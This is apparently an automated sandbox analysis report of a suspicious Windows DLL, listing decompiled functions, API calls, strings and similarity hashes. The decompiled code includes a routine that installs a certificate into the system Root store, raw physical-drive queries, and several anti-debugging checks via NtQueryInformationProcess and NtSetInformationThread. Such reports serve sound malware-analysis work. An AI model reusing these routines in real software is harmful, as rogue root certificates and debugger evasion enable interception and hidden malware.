Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F842
CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F861
GetLastError.KERNEL32 ref: 1001F877
CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F8A2
_memset.LIBCMT ref: 1001F8DB
CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F8F1
_memset.LIBCMT ref: 1001F90C
_memset.LIBCMT ref: 1001F929
_sprintf.LIBCMT ref: 1001F97C
_sprintf.LIBCMT ref: 1001F999
CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F9D2
CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F9DC

Strings

%02X, xrefs: 1001F969
Software\Microsoft\SystemCertificates\Root\Certificates\%s, xrefs: 1001F98D
Root, xrefs: 1001F832

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
API String ID: 3311258246-1857994723
Opcode ID: 1e4d97f329b5e1f4bc93b0763e4fcb6cb0116e427961557286b91f0a253fefe1
Instruction ID: 735c7eb008ba94e8865f05c141388d8d9a48af4fd13d1d85c3f126029706ba6d
Opcode Fuzzy Hash: 1e4d97f329b5e1f4bc93b0763e4fcb6cb0116e427961557286b91f0a253fefe1
Instruction Fuzzy Hash: B76133B5D00219AFEB10DF90CC99FFEB7B4EB48704F104598E605AB181D7B5AA85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1000E96E, Relevance: 25.6, APIs: 17, Instructions: 90
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E1000E96E() {
				int _t13;
				long _t19;
				signed int _t20;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				signed int _t27;
				signed int _t28;
				signed int _t32;
				signed int _t33;
				void* _t37;
				long _t39;
				void* _t40;
				signed int _t47;
				struct _OSVERSIONINFOA* _t49;
				void* _t51;

				_t37 = GetProcessHeap;
				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
				if(_t49 != 0) {
					_t49->dwOSVersionInfoSize = 0x94;
					_t13 = GetVersionExA(_t49);
					__eflags = _t13;
					_push(_t49);
					_push(0);
					if(_t13 != 0) {
						 *(_t51 + 0xc) = _t49->dwPlatformId;
						 *(_t51 + 0x10) = _t49->dwMajorVersion;
						 *(_t51 - 4) = _t49->dwMinorVersion;
						_t47 = _t49->dwBuildNumber & 0x00007fff;
						HeapFree(GetProcessHeap(), ??, ??);
						_t19 =  *(_t51 + 0xc);
						__eflags = _t19 - 2;
						if(_t19 != 2) {
							_t47 = _t47 | 0x00008000;
							__eflags = _t47;
						}
						_t39 =  *(_t51 - 4);
						 *0x1033548c = _t19;
						_t20 =  *(_t51 + 0x10);
						_t44 = (_t20 << 8) + _t39;
						 *0x10335494 = (_t20 << 8) + _t39;
						 *0x10335498 = _t20;
						 *0x1033549c = _t39;
						 *0x10335490 = _t47;
						_t21 = E1000F81F(1);
						__eflags = _t21;
						_pop(_t40);
						if(_t21 == 0) {
							goto L1;
						} else {
							_t23 = E10011936(_t37);
							__eflags = _t23;
							if(_t23 != 0) {
								E100150E1();
								 *0x10338f64 = GetCommandLineA();
								 *0x103352fc = E10014FAC(); // executed
								_t27 = E100149F4(_t37, _t44, _t47, _t49, __eflags); // executed
								__eflags = _t27;
								if(_t27 >= 0) {
									_t28 = E10014EF3(_t40);
									__eflags = _t28;
									if(_t28 < 0) {
										L15:
										E10014C34();
										goto L10;
									} else {
										_t32 = E10014C80(_t40, _t44);
										__eflags = _t32;
										if(_t32 < 0) {
											goto L15;
										} else {
											_t33 = E10011BD6(_t37, _t47, _t49, _t51, 0);
											__eflags = _t33;
											if(_t33 != 0) {
												goto L15;
											} else {
												 *0x103352f8 =  *0x103352f8 + 1;
												_t22 = 1;
												__eflags = 1;
											}
										}
									}
								} else {
									L10:
									E10011620();
									goto L8;
								}
							} else {
								L8:
								E1000F879();
								goto L1;
							}
						}
					} else {
						HeapFree(GetProcessHeap(), ??, ??);
						goto L1;
					}
				} else {
					L1:
					_t22 = 0;
				}
				return _t22;
			}

0x1000e96e
0x1000e985
0x1000e989
0x1000e993
0x1000e995
0x1000e99b
0x1000e99d
0x1000e99e
0x1000e9a0
0x1000e9b3
0x1000e9b9
0x1000e9bf
0x1000e9c2
0x1000e9cb
0x1000e9d1
0x1000e9d4
0x1000e9d7
0x1000e9d9
0x1000e9d9
0x1000e9d9
0x1000e9df
0x1000e9e2
0x1000e9e7
0x1000e9ef
0x1000e9f3
0x1000e9f9
0x1000e9fe
0x1000ea04
0x1000ea0a
0x1000ea0f
0x1000ea11
0x1000ea12
0x00000000
0x1000ea18
0x1000ea18
0x1000ea1d
0x1000ea1f
0x1000ea2b
0x1000ea36
0x1000ea40
0x1000ea45
0x1000ea4a
0x1000ea4c
0x1000ea55
0x1000ea5a
0x1000ea5c
0x1000ea7e
0x1000ea7e
0x00000000
0x1000ea5e
0x1000ea5e
0x1000ea63
0x1000ea65
0x00000000
0x1000ea67
0x1000ea69
0x1000ea6e
0x1000ea71
0x00000000
0x1000ea73
0x1000ea73
0x1000eb2c
0x1000eb2c
0x1000eb2c
0x1000ea71
0x1000ea65
0x1000ea4e
0x1000ea4e
0x1000ea4e
0x00000000
0x1000ea4e
0x1000ea21
0x1000ea21
0x1000ea21
0x00000000
0x1000ea21
0x1000ea1f
0x1000e9a2
0x1000e9a5
0x00000000
0x1000e9a5
0x1000e98b
0x1000e98b
0x1000e98b
0x1000e98b
0x1000eb31

APIs

GetProcessHeap.KERNEL32(00000000,00000094), ref: 1000E97C
HeapAlloc.KERNEL32(00000000), ref: 1000E97F
GetVersionExA.KERNEL32(00000000), ref: 1000E995
GetProcessHeap.KERNEL32(00000000,00000000), ref: 1000E9A2
HeapFree.KERNEL32(00000000), ref: 1000E9A5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 1000E9C8
HeapFree.KERNEL32(00000000), ref: 1000E9CB
__heap_term.LIBCMT ref: 1000EA21
__RTC_Initialize.LIBCMT ref: 1000EA2B
GetCommandLineA.KERNEL32 ref: 1000EA30
___crtGetEnvironmentStringsA.LIBCMT ref: 1000EA3B
__ioinit.LIBCMT ref: 1000EA45
__mtterm.LIBCMT ref: 1000EA4E
__setargv.LIBCMT ref: 1000EA55
__setenvp.LIBCMT ref: 1000EA5E
__cinit.LIBCMT ref: 1000EA69
__ioterm.LIBCMT ref: 1000EA7E

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
String ID:
API String ID: 2870529951-0
Opcode ID: fc94a89f3ef1200f27781975550bb89b68149c34957b6fa54f9fd08f5d5b4d7a
Instruction ID: 8b665d2d90db9d313c13c33d8a46f5d936d5b37bcfbd2c7c3b96e787307a2e84
Opcode Fuzzy Hash: fc94a89f3ef1200f27781975550bb89b68149c34957b6fa54f9fd08f5d5b4d7a
Instruction Fuzzy Hash: 4731C875A043518FF350DFB58DC161A37E8FF49381F228429E909DB256EB30EC818B51

Uniqueness

Uniqueness Score: -1.00%

Function 1001D840, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E1001D840(void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed short* _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				char _v570;
				short _v572;
				char _v1596;
				void* _v1600;
				char _v1604;
				long _v1608;
				signed int _v1612;
				void* _v1616;
				void* _v1620;
				void* _v1624;
				void* _v1628;
				void* _v1632;
				signed int _v1633;
				void _v1636;
				char _v2148;
				char _v2164;
				void* _t73;
				int _t78;
				void* _t88;
				void* _t94;
				void* _t123;
				void* _t124;

				_t123 = __edi;
				_v52 = _a4;
				if(_a4 == 0) {
					L18:
					return 0;
				}
				_v1600 = 0;
				_v1612 = 0;
				while(1 != 0) {
					_v572 = 0;
					E1000CF80(_t123,  &_v570, 0, 0x1fe);
					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
					_t124 = _t124 + 0x18;
					_t73 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0); // executed
					_v48 = _t73;
					if(_v48 == 0xffffffff) {
						L15:
						_v1612 = 1 + _v1612;
						if(_v1612 < 4) {
							continue;
						}
						return _v1600;
					}
					_v1608 = 0;
					_v1636 = 0;
					_v1632 = 0;
					_v1628 = 0;
					_v1624 = 0;
					_v1620 = 0;
					_v1616 = 0;
					_t78 = DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0); // executed
					if(_t78 == 0) {
						CloseHandle(_v48);
						goto L15;
					}
					if((_v1633 & 0x000000ff) == 0) {
						L11:
						CloseHandle(_v48);
						if(_v1600 == 0) {
							goto L15;
						}
						return _v1600;
					}
					asm("sbb edx, edx");
					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					E1000CF80(_t123,  &_v2164, 0, 0x210);
					_t88 = E1001CF80( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
					_t124 = _t124 + 0x24;
					if(_t88 == 0) {
						goto L11;
					}
					_v60 =  &_v1596;
					_v44 =  &_v2148;
					do {
						 *_v60 =  *_v44 & 0x0000ffff;
						_v44 =  &(_v44[1]);
						_v60 =  &(_v60[1]);
					} while (_v44 <  &_v1636);
					_v56 = E1001CDD0( &_v1596);
					_t94 = E1001D000(_v56, 0x104, _v52);
					_t124 = _t124 + 0x10;
					if(_t94 == 0) {
						_v1600 = 1;
					}
					goto L11;
				}
				goto L18;
			}

0x1001d840
0x1001d84c
0x1001d853
0x1001dac4
0x00000000
0x1001dac4
0x1001d859
0x1001d863
0x1001d86d
0x1001d87a
0x1001d891
0x1001d8ac
0x1001d8b2
0x1001d8cb
0x1001d8d1
0x1001d8d8
0x1001da9d
0x1001daac
0x1001dab5
0x00000000
0x1001dabf
0x00000000
0x1001dab7
0x1001d8de
0x1001d8e8
0x1001d8f2
0x1001d8fc
0x1001d906
0x1001d910
0x1001d91a
0x1001d943
0x1001d94b
0x1001da97
0x00000000
0x1001da97
0x1001d95a
0x1001da76
0x1001da7a
0x1001da87
0x00000000
0x1001da91
0x00000000
0x1001da89
0x1001d974
0x1001d97f
0x1001d985
0x1001d98c
0x1001d993
0x1001d99a
0x1001d9a1
0x1001d9a8
0x1001d9af
0x1001d9b6
0x1001d9bd
0x1001d9cf
0x1001d9fb
0x1001da00
0x1001da05
0x00000000
0x00000000
0x1001da0d
0x1001da16
0x1001da19
0x1001da22
0x1001da2a
0x1001da33
0x1001da3c
0x1001da50
0x1001da60
0x1001da65
0x1001da6a
0x1001da6c
0x1001da6c
0x00000000
0x1001da6a
0x00000000

APIs

_memset.LIBCMT ref: 1001D891
wsprintfW.USER32 ref: 1001D8AC
CreateFileW.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D8CB
DeviceIoControl.KERNELBASE(000000FF,00074080,00000000,00000000,00000000,00000018,00000000,00000000), ref: 1001D943
_memset.LIBCMT ref: 1001D9CF
CloseHandle.KERNEL32(000000FF), ref: 1001DA7A
CloseHandle.KERNEL32(000000FF), ref: 1001DA97

Strings

\\.\PhysicalDrive%d, xrefs: 1001D8A0

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
String ID: \\.\PhysicalDrive%d
API String ID: 381188756-2935326385
Opcode ID: bf343d5d5fa73e07ffbe7669497774d3557a30f7b648ec5a239837437c2a4efd
Instruction ID: 9769834fe5c7fcaed127812980974d4bd2fdd9b920265f280a0c2248b2b16186
Opcode Fuzzy Hash: bf343d5d5fa73e07ffbe7669497774d3557a30f7b648ec5a239837437c2a4efd
Instruction Fuzzy Hash: EA615EB0D042189BEB20DF94CC95BDDB7B6EF84314F148199E5097B280DB76AAD8CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1001DAD0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001DAD0(void* __edi, intOrPtr _a4) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				void* _v16;
				short _v532;
				struct _OVERLAPPED* _v536;
				struct _OVERLAPPED* _v540;
				void _v544;
				long _v548;
				struct _OVERLAPPED* _v552;
				intOrPtr _v10532;
				void _v10556;
				char _v11556;
				void* _t43;
				int _t48;
				void* _t56;
				void* _t70;
				void* _t71;

				_t70 = __edi;
				E10018B00(0x2d20);
				if(_a4 == 0) {
					L13:
					return 0;
				}
				_v8 = 0;
				_v12 = 0;
				_v552 = 0;
				while(1 != 0) {
					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
					_t71 = _t71 + 0xc;
					_t43 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0); // executed
					_v16 = _t43;
					if(_v16 == 0xffffffff) {
						L10:
						_v8 =  &(_v8->Internal);
						_v552 = _v8;
						if(_v8 < 4) {
							continue;
						}
						return _v12;
					}
					_v548 = 0;
					_v536 = 0;
					_v544 = 0;
					_v540 = 0;
					E1000CF80(_t70,  &_v10556, 0, 0x2710);
					_t71 = _t71 + 0xc;
					_t48 = DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0); // executed
					if(_t48 != 0) {
						E1000CF80(_t70,  &_v11556, 0, 0x3e8);
						E1001D0A0(_v10532,  &_v10556,  &_v11556);
						_t56 = E1001D000( &_v11556, 0x104, _a4);
						_t71 = _t71 + 0x24;
						if(_t56 == 0) {
							_v12 = 1;
						}
					}
					FindCloseChangeNotification(_v16); // executed
					if(_v12 == 0) {
						_v8 = _v552;
						goto L10;
					} else {
						return _v12;
					}
				}
				goto L13;
			}

0x1001dad0
0x1001dad8
0x1001dae1
0x1001dc50
0x00000000
0x1001dc50
0x1001dae7
0x1001daee
0x1001daf5
0x1001daff
0x1001db1c
0x1001db22
0x1001db38
0x1001db3e
0x1001db45
0x1001dc2e
0x1001dc34
0x1001dc3a
0x1001dc44
0x00000000
0x1001dc4b
0x00000000
0x1001dc46
0x1001db4b
0x1001db55
0x1001db5f
0x1001db69
0x1001db81
0x1001db86
0x1001dbb0
0x1001dbb8
0x1001dbc8
0x1001dbe5
0x1001dbfd
0x1001dc02
0x1001dc07
0x1001dc09
0x1001dc09
0x1001dc07
0x1001dc14
0x1001dc1e
0x1001dc2b
0x00000000
0x1001dc20
0x00000000
0x1001dc20
0x1001dc1e
0x00000000

APIs

wsprintfW.USER32 ref: 1001DB1C
CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DB38
_memset.LIBCMT ref: 1001DB81
DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DBB0
_memset.LIBCMT ref: 1001DBC8
FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DC14

Strings

\\.\PhysicalDrive%d, xrefs: 1001DB10

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$ChangeCloseControlCreateDeviceFileFindNotificationwsprintf
String ID: \\.\PhysicalDrive%d
API String ID: 198797371-2935326385
Opcode ID: 72aa308726503228d4dbb6d10f427f4c68655386cdf40f6154bcdc289d9c98a1
Instruction ID: 915ac6fd4bdffd3e24e0157f7485166cbeb8f51988887240e801f9576dbfd67f
Opcode Fuzzy Hash: 72aa308726503228d4dbb6d10f427f4c68655386cdf40f6154bcdc289d9c98a1
Instruction Fuzzy Hash: B3413F75E40218EBEB10EB90DC89FDDB7B8EB14704F104599E509AA2C1D7B4ABC8CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001A000, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26
librarynativeloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A000() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 7,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}

0x1001a006
0x1001a018
0x1001a02a
0x1001a03e
0x1001a04d

APIs

LoadLibraryA.KERNEL32(Ntdll.dll), ref: 1001A012
GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 1001A024
GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 1001A037
NtQueryInformationProcess.NTDLL(00000000), ref: 1001A03E

Strings

NtQueryInformationProcess, xrefs: 1001A01B
Ntdll.dll, xrefs: 1001A00D

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
String ID: NtQueryInformationProcess$Ntdll.dll
API String ID: 3653371871-801751246
Opcode ID: 38e3ca949b96ec1f02b6c056c4686b534a5e8ee6be15c149bd05a26a226aa475
Instruction ID: 71e2acb23208394f78a226fd07bfd7a9a839184327190de95aec6d8225f51f41
Opcode Fuzzy Hash: 38e3ca949b96ec1f02b6c056c4686b534a5e8ee6be15c149bd05a26a226aa475
Instruction Fuzzy Hash: 4DF0A575D44208FFEB10EBE0DD8DB9DBBB8EB04201F614494EA15A6180EA746A49CB55

Uniqueness

Uniqueness Score: -1.00%

Function 10019F60, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26
librarynativeloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019F60() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 1;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 0x1f,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000001;
			}

0x10019f66
0x10019f78
0x10019f8a
0x10019f9e
0x10019fad

APIs

LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F72
GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F84
GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F97
NtQueryInformationProcess.NTDLL(00000000), ref: 10019F9E

Strings

NtQueryInformationProcess, xrefs: 10019F7B
Ntdll.dll, xrefs: 10019F6D

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
String ID: NtQueryInformationProcess$Ntdll.dll
API String ID: 3653371871-801751246
Opcode ID: dc2663662de57aa8d86a3c57fad3ddc80e3676cde8346b3d07215fab81a3fbda
Instruction ID: d88cad77f1889e8aed178f934c13fc5a1fcc4ce016c014487da4b3248a857db2
Opcode Fuzzy Hash: dc2663662de57aa8d86a3c57fad3ddc80e3676cde8346b3d07215fab81a3fbda
Instruction Fuzzy Hash: 1FF01C75900208FBEB00DBE08D8DA9CBB78EB04301F514094FB11A6140DA751A48CB55

Uniqueness

Uniqueness Score: -1.00%

Function 10019FB0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26
librarynativeloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019FB0() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 0x1e,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}

0x10019fb6
0x10019fc8
0x10019fda
0x10019fee
0x10019ffd

APIs

LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FC2
GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FD4
GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019FE7
NtQueryInformationProcess.NTDLL(00000000), ref: 10019FEE

Strings

NtQueryInformationProcess, xrefs: 10019FCB
Ntdll.dll, xrefs: 10019FBD

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
String ID: NtQueryInformationProcess$Ntdll.dll
API String ID: 3653371871-801751246
Opcode ID: 97d65c81b8affce13ccd6c9ce68ef998821de5ec64206124f7a57a839e50d98e
Instruction ID: aa9a5b676a7025e0056a7a55a28efeedef31c6b5470972081c5102af1e44dd82
Opcode Fuzzy Hash: 97d65c81b8affce13ccd6c9ce68ef998821de5ec64206124f7a57a839e50d98e
Instruction Fuzzy Hash: 35F01C75900208FBEB009BE0CD4DBDCBBB8EB04301F514094EA11A6180DA741A48CB55

Uniqueness

Uniqueness Score: -1.00%

Function 10019DA0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 20
librarythreadnativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019DA0() {
				_Unknown_base(*)()* _v8;
				struct HINSTANCE__* _v12;

				_v12 = LoadLibraryA("Ntdll.dll");
				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
				return NtSetInformationThread(GetCurrentThread(), 0x11, 0, 0);
			}

0x10019db1
0x10019dc3
0x10019dd9

APIs

LoadLibraryA.KERNEL32(Ntdll.dll,?,100207E1), ref: 10019DAB
GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019DBD
GetCurrentThread.KERNEL32 ref: 10019DCC
NtSetInformationThread.NTDLL(00000000,?,100207E1), ref: 10019DD3

Strings

ZwSetInformationThread, xrefs: 10019DB4
Ntdll.dll, xrefs: 10019DA6

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Thread$AddressCurrentInformationLibraryLoadProc
String ID: Ntdll.dll$ZwSetInformationThread
API String ID: 1707985920-1680533912
Opcode ID: 81fb8b46b22517918d6ec40a5a4b5af2fd6c90d3156655230c1d6776d8c37ca9
Instruction ID: ec36d98e740d09ce498d664616d1e94f1a85ab36ce5175e8c059281a5b49cb64
Opcode Fuzzy Hash: 81fb8b46b22517918d6ec40a5a4b5af2fd6c90d3156655230c1d6776d8c37ca9
Instruction Fuzzy Hash: 7FE0E674944208FBEF009BE09D8DB9CBB78EB04702FA14051FF05A6280DA715A454AA5

Uniqueness

Uniqueness Score: -1.00%

Function 1001A150, Relevance: 6.0, APIs: 4, Instructions: 36
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A150(CHAR* _a4) {
				struct _SECURITY_DESCRIPTOR _v24;
				int _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				int _v44;
				void* _t19;

				_v44 = 0;
				_v28 = 0;
				InitializeSecurityDescriptor( &_v24, 1);
				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor =  &_v24;
				_t19 = CreateMutexA( &_v40, 0, _a4); // executed
				_v28 = _t19;
				if(_v28 != 0 && GetLastError() == 0xb7) {
					_v44 = 1;
				}
				return _v44;
			}

0x1001a156
0x1001a15d
0x1001a16a
0x1001a17a
0x1001a180
0x1001a187
0x1001a191
0x1001a19e
0x1001a1a4
0x1001a1ab
0x1001a1ba
0x1001a1ba
0x1001a1c7

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A16A
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A17A
CreateMutexA.KERNELBASE(0000000C,00000000,100206C4), ref: 1001A19E
GetLastError.KERNEL32 ref: 1001A1AD

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
String ID:
API String ID: 4085719312-0
Opcode ID: dfe9d4db1a26c01aa306363c359991dbed2ed50b1dc0d3df9fdb4fd6b1ce982a
Instruction ID: 3bb7ca3d3a89cab5a40ee6ca153f8139473754825ab1ab767a0ca4e665a0d5f7
Opcode Fuzzy Hash: dfe9d4db1a26c01aa306363c359991dbed2ed50b1dc0d3df9fdb4fd6b1ce982a
Instruction Fuzzy Hash: EC01BB71940309DFEB10DFD0C989BEDBBB4EB08315F600504EA05BA290D7B5AAC5CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 1001A1D0, Relevance: 3.0, APIs: 2, Instructions: 21
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A1D0(CHAR* _a4) {
				struct _WIN32_FIND_DATAA _v324;
				intOrPtr _v328;
				void* _v332;
				void* _t11;

				_v328 = 0;
